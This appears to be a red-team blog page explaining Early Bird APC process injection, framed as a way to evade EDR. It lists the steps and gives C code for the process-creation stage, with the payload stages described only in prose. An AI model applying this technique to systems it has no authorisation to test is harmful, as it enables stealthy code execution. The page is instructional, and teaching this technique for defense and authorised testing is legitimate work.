Early Birds

Outflank released an interesting post about Early Cascade Injection

Recently, I was able to get my hands on Outflank OST to build and compile interesting implants that target specific EDR solutions with 0 detections. Comes very handy during red team engagements. One of the injection techniques used by Outflank implants is the famous Early Cascade draws upon the well-known Early Bird APC Injection.

Let's break down.

QueueUserAPC is commonly used to perform local APC injection. The same API can be used to execute a payload in a remote process.

APC injection requires either a suspended or an alertable thread to successfully execute the payload. However, it is difficult to come across threads that are in these states, especially ones that are operating under normal user privileges.

The solution for this is to create a suspended process using the CreateProcess WinAPI and use the handle to its suspended thread. The suspended thread meets the criteria to be used in APC injection. This method is known as Early Bird APC Injection.

📝 Implementation Steps

The implementation logic of this technique will be as follows:

Create a suspended process by using the CREATE_SUSPENDED flag.
Write the payload to the address space of the new target process.
Get the suspended thread's handle from CreateProcess along with the payload's base address and pass them to QueueUserAPC.
Resume the thread using the ResumeThread WinAPI to execute the payload.

Injection Process

CreateSuspendedProcess2 is a function that performs Early Bird APC Injection and requires 4 arguments:

lpProcessName - The name of the process to create.
dwProcessId - A pointer to a DWORD which will receive the newly created process's PID.
hProcess - Pointer to a HANDLE that will receive the newly created process's handle.
hThread - Pointer to a HANDLE that will receive the newly created process's thread.

BOOL CreateSuspendedProcess2(LPCSTR lpProcessName, DWORD* dwProcessId, HANDLE* hProcess, HANDLE* hThread) {

	CHAR lpPath   [MAX_PATH * 2];
	CHAR WnDr     [MAX_PATH];

	STARTUPINFO            Si    = { 0 };
	PROCESS_INFORMATION    Pi    = { 0 };

	// Cleaning the structs by setting the element values to 0
	RtlSecureZeroMemory(&Si, sizeof(STARTUPINFO));
	RtlSecureZeroMemory(&Pi, sizeof(PROCESS_INFORMATION));

	// Setting the size of the structure
	Si.cb = sizeof(STARTUPINFO);

	// Getting the %WINDIR% environment variable path (That is generally 'C:\Windows')
	if (!GetEnvironmentVariableA("WINDIR", WnDr, MAX_PATH)) {
		printf("[!] GetEnvironmentVariableA Failed With Error : %d \n", GetLastError());
		return FALSE;
	}

	// Creating the target process path 
	sprintf(lpPath, "%s\\System32\\%s", WnDr, lpProcessName);
	printf("\n\t[i] Running : \"%s\" ... ", lpPath);

	// Creating the process
	if (!CreateProcessA(
		NULL,
		lpPath,
		NULL,
		NULL,
		FALSE,
		DEBUG_PROCESS,		// Instead of CREATE_SUSPENDED		
		NULL,
		NULL,
		&Si,
		&Pi)) {
		printf("[!] CreateProcessA Failed with Error : %d \n", GetLastError());
		return FALSE;
	}

	printf("[+] DONE \n");

	// Filling up the OUTPUT parameter with CreateProcessA's output
	*dwProcessId        = Pi.dwProcessId;
	*hProcess           = Pi.hProcess;
	*hThread            = Pi.hThread;

	// Doing a check to verify we got everything we need
	if (*dwProcessId != NULL && *hProcess != NULL && *hThread != NULL)
		return TRUE;
	
	return FALSE;
}

The screenshot below shows the newly created target process in a debug state. A debugged process is highlighted in purple in Process Hacker.

Next, the payload is written to the process memory

The payload is executed.

PreviousBunker NextProcess Mitigation Policy

Last updated 4 months ago